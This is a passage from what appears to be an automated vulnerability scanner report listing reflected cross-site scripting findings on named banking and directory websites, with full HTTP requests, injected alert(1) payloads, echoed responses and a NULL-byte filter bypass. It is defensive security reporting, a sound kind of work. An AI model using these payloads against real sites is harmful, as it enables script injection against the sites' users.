Content-Length: 5895
Set-Cookie: USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
<script language="javascript">
       var date = new Date();
       date.setTime(date.getTime()+(365*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
       document.cookie = "hp_pref"+"="+"r74bf5";alert(1)//00c0d1ff9"+expires+"; path=/";


               window.location="null"
</script>
...[SNIP]...

1.532. http://www.us.hsbc.com/1/2/3/hsbcpremier/apply [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/apply

Issue detail

The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 was submitted in the code parameter. This input was echoed as afe63"style="x:expression(alert(1))"19a95eb25d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /1/2/3/hsbcpremier/apply?code=MEP0002714afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:39 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:39 GMT
Vary: User-Agent,Cookie
Set-Cookie: USIB2G=0000Dhol7ilZ0q0aTb173umEJKd:14k1jbteq; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:38 GMT; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 34486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv
...[SNIP]...
-LEFT: 20px; PADDING-TOP: 4px; font-family: Times New Roman, Arial !important; FONT-WEIGHT: bold;" class="redbox" href="https://www.us.hsbc.com/1/2/3/hsbcpremier/apply/start?custype=no&&code=MEP0002714afe63"style="x:expression(alert(1))"19a95eb25d7">
...[SNIP]...

1.533. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7758e"%3balert(1)//c523249deae was submitted in the code parameter. This input was echoed as 7758e";alert(1)//c523249deae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM00016997758e"%3balert(1)//c523249deae&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:11 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:11 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000JbZ447P9hCR84of1XRxrbLB:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
ars = {
        basePath: "/1/PA_1_083Q9FJ08A002FBP5S00000000/content/usshared/Premier/Promotions/2011/Jan/",
        contactUrl: "https://www.us.hsbc.com/1/2/3/hsbcpremier/prom/contact-us?code=CSM00016997758e";alert(1)//c523249deae&WT.ac=HBUS_CSM00016997758e";alert(1)//c523249deae&HiddenMandatoryFields.ProductionPromotionCode=CSM00016997758e";alert(1)//c523249deae",
           deepLinkID: "",
           xmlPath:"/1/PA_1_083Q9FJ08A002FBP5S000000
...[SNIP]...

1.534. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae3f'%3balert(1)//f4fc58b391e was submitted in the code parameter. This input was echoed as eae3f';alert(1)//f4fc58b391e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699eae3f'%3balert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:12 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000bKlIRzRrrCPXuxZazS0H-Ki:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
yes,menubar=yes,resizable=yes,scrollbars=yes,toolbar=yes,width=470,height=570,screenX=0,left=0,screenY=0,top=0";
   window.open( 'https://www.us.hsbc.com/1/2/3/hsbcpremier/prom/contact-us?code=CSM0001699eae3f';alert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699eae3f';alert(1)//f4fc58b391e&HiddenMandatoryFields.ProductionPromotionCode=CSM0001699eae3f';alert(1)//f4fc58b391e','_blank', features );
}
</script>
...[SNIP]...

1.535. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f was submitted in the code parameter. This input was echoed as 41ec8"style="x:expression(alert(1))"fd17a07d03f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM000169941ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:10 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:10 GMT
Vary: User-Agent,Cookie
Content-Length: 27260
Set-Cookie: USIB2G=0000NYkxlYtKgvFgWjsyZ7uTMLY:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
<a id="begin_now" href="http://www.us.hsbc.com/1/2/3/hsbcpremier/apply?code=CSM000169941ec8"style="x:expression(alert(1))"fd17a07d03f" title="Begin Now">
...[SNIP]...

1.536. http://www201.americanexpress.com/business-credit-cards/ [inav parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52396"%3balert(1)//a663c189a2b was submitted in the inav parameter. This input was echoed as 52396";alert(1)//a663c189a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?inav=footer_small_business_credit_cards52396"%3balert(1)//a663c189a2b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:24 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=a;Expires=Thu, 10-Feb-2011 14:15:24 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "inav=footer_small_business_credit_cards52396";alert(1)//a663c189a2b";
   </script>
...[SNIP]...

1.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a54"%3balert(1)//fd4c9d0046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a54";alert(1)//fd4c9d0046f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?15a54"%3balert(1)//fd4c9d0046f=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:29 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742109623898; path=/; expires=Sun, 07-Feb-16 14:08:29 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000kt9fEePAKN3zFZ84FN4F_Dj:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:29 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "15a54";alert(1)//fd4c9d0046f=1";
   </script>
...[SNIP]...

1.538. http://www201.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44aa5"%3balert(1)//7dd45ad0d89 was submitted in the view-all-business-cards&inav parameter. This input was echoed as 44aa5";alert(1)//7dd45ad0d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards44aa5"%3balert(1)//7dd45ad0d89 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:11 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:15:11 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "inav=menu_cards_sbc_viewallcards44aa5";alert(1)//7dd45ad0d89";
   </script>
...[SNIP]...

1.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7597"><script>alert(1)</script>c7d4c5b0106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7597"><script>alert(1)</script>c7d4c5b0106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-credit-cards/business-credit-cards?%00d7597"><script>alert(1)</script>c7d4c5b0106=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:36 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742116979490; path=/; expires=Sun, 07-Feb-16 14:08:36 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000HiS-OjEOSZC4JaXS7Qm_PPe:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:36 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<link rel="canonical" href="http://www201.americanexpress.com/42002?.d7597"><script>alert(1)</script>c7d4c5b0106=1" />
...[SNIP]...

1.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8efe8"%3balert(1)//d1240e2685e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8efe8";alert(1)//d1240e2685e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/business-credit-cards?8efe8"%3balert(1)//d1240e2685e=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742121204958; path=/; expires=Sun, 07-Feb-16 14:08:41 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000zXlT7tO4dPEpQjTetmu9Wlt:1115nbqmn;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:41 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "8efe8";alert(1)//d1240e2685e=1";
   </script>
...[SNIP]...

1.541. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8dc2"><script>alert(1)</script>6a405ec230b was submitted in the source parameter. This input was echoed as d8dc2"><script>alert(1)</script>6a405ec230b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%00d8dc2"><script>alert(1)</script>6a405ec230b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:32 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742112375272; path=/; expires=Sun, 07-Feb-16 14:08:32 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000ZIXNv3hxn7zFYSx2jAzWxLF:1115nbqmn;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:32 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<link rel="canonical" href="http://www201.americanexpress.com/42002?source=footer_small_business_credit_cards.d8dc2"><script>alert(1)</script>6a405ec230b" />
...[SNIP]...

1.542. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cde0"%3balert(1)//2536ed24016 was submitted in the source parameter. This input was echoed as 3cde0";alert(1)//2536ed24016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0"%3balert(1)//2536ed24016 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:38 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742118555633; path=/; expires=Sun, 07-Feb-16 14:08:38 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000BLrKMWo6FW5mWWeCqsNkbyV:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:38 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "source=footer_small_business_credit_cards3cde0";alert(1)//2536ed24016";
   </script>
...[SNIP]...

1.543. http://www201.americanexpress.com/getthecard/home [sj_tabToOpen parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /getthecard/home

Issue detail

The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de360%3balert(1)//2236b1cd6cb was submitted in the sj_tabToOpen parameter. This input was echoed as de360;alert(1)//2236b1cd6cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getthecard/home?sj_tabToOpen=1de360%3balert(1)//2236b1cd6cb&inav=menu_cards_pc_choosecard HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:19 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742099505091; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000oTYlMuvkOz4vp-E22WS5ugk:10ue6mmd9;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="htt
...[SNIP]...
<script type="text/javascript">
var sj_responseText="";
var sj_rsvpStatus="";
var sj_offerURL="";
var sj_rsvpAttempts= 0;
var sj_pageContext="Prospect";
var sj_tabToOpen = 1de360;alert(1)//2236b1cd6cb;
var sj_modalToOpen = "null";
var sj_servername = "www201.americanexpress.com";
</script>
...[SNIP]...

1.544. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87daf"-alert(1)-"1a7bb763e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile87daf&quot;-alert(1)-&quot;1a7bb763e07/css/busprofile.css
Server: Unspecified
Set-Cookie: JSESSIONID=B99972F11C8DCBE31C71CEA0725DF8FE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:56 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.545. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

